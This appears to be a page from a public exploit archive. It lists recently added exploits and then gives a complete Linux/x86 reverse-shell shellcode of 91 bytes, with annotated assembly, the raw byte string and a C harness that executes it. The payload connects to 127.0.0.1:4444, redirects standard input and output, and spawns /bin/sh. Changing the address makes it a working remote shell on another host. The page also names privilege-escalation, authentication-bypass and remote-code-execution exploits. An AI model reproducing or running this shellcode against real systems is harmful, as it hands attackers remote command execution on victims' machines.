588067072a
15 changes to exploits/shellcodes sudo 1.8.28 - Security Bypass sudo 1.2.27 - Security Bypass Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path X.Org X Server 1.20.4 - Local Stack Overflow LiteManager 4.5.0 - 'romservice' Unquoted Serive Path Solaris xscreensaver 11.4 - Privilege Escalation Mikogo 5.2.2.150317 - 'Mikogo-Service' Unquoted Serive Path Whatsapp 2.19.216 - Remote Code Execution Accounts Accounting 7.02 - Persistent Cross-Site Scripting CyberArk Password Vault 10.6 - Authentication Bypass Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes) Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes) Linux/x86 - execve /bin/sh Shellcode (25 bytes) Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
89 lines
No EOL
2.5 KiB
C
89 lines
No EOL
2.5 KiB
C
# Exploit Title: Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)
|
|
# Date: 2019-10-16
|
|
# Author: bolonobolo
|
|
# Tested on: Linux x86
|
|
# Software: N/A
|
|
# CVE: N/A
|
|
|
|
/*
|
|
global _start
|
|
|
|
section .text
|
|
_start:
|
|
|
|
|
|
;socket()
|
|
xor ecx, ecx ; xoring ECX
|
|
xor ebx, ebx ; xoring EBX
|
|
mul ebx ; xoring EAX and EDX
|
|
inc cl ; ECX should be 1
|
|
inc bl
|
|
inc bl ; EBX should be 2
|
|
mov ax, 0x167 ;
|
|
int 0x80 ; call socket()
|
|
|
|
;connect() ; move the return value of socket
|
|
xchg ebx, eax ; from EAX to EBX ready for the next syscalls
|
|
|
|
; push sockaddr structure in the stack
|
|
dec cl
|
|
push ecx ; unused char (0)
|
|
|
|
; move the lenght (16 bytes) of IP in EDX
|
|
mov dl, 0x16
|
|
|
|
; the ip address 1.0.0.127 could be 4.3.3.130 to avoid NULL bytes
|
|
mov ecx, 0x04030382 ; mov ip in ecx
|
|
sub ecx, 0x03030303 ; subtract 3.3.3.3 from ip
|
|
push ecx ; load the real ip in the stack
|
|
push word 0x5c11 ; port 4444
|
|
push word 0x02 ; AF_INET family
|
|
lea ecx, [esp]
|
|
; EBX still contain the value of the
|
|
opened socket
|
|
mov ax, 0x16a
|
|
int 0x80
|
|
|
|
; dup2()
|
|
xor ecx, ecx
|
|
mov cl, 0x3
|
|
|
|
dup2:
|
|
xor eax, eax
|
|
; EBX still contain the value of the
|
|
opened socket
|
|
mov al, 0x3f
|
|
dec cl
|
|
int 0x80
|
|
jnz dup2
|
|
|
|
; execve() from the previous polymorphic analysis 25 bytes
|
|
cdq ; xor edx
|
|
mul edx ; xor eax
|
|
lea ecx, [eax] ; xor ecx
|
|
mov esi, 0x68732f2f
|
|
mov edi, 0x6e69622f
|
|
push ecx ; push NULL in stack
|
|
push esi ; push hs/ in stack
|
|
push edi ; push nib// in stack
|
|
lea ebx, [esp] ; load stack pointer to ebx
|
|
mov al, 0xb ; load execve in eax
|
|
int 0x80
|
|
*/
|
|
|
|
#include<stdio.h>
|
|
#include<string.h>
|
|
|
|
unsigned char code[] = \
|
|
"\x31\xc9\x31\xdb\xf7\xe3\xfe\xc1\xfe\xc3\xfe\xc3\x66\xb8\x67\x01\xcd\x80\x93\xfe\xc9\x51\xb2\x16\xb9\x82\x03\x03\x04\x81\xe9\x03\x03\x03\x03\x51\x66\x68\x11\x5c\x66\x6a\x02\x8d\x0c\x24\x66\xb8\x6a\x01\xcd\x80\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf6\x99\xf7\xe2\x8d\x08\xbe\x2f\x2f\x73\x68\xbf\x2f\x62\x69\x6e\x51\x56\x57\x8d\x1c\x24\xb0\x0b\xcd\x80";
|
|
|
|
void main()
|
|
{
|
|
|
|
printf("Shellcode Length: %d\n", strlen(code));
|
|
|
|
int (*ret)() = (int(*)())code;
|
|
|
|
ret();
|
|
|
|
} |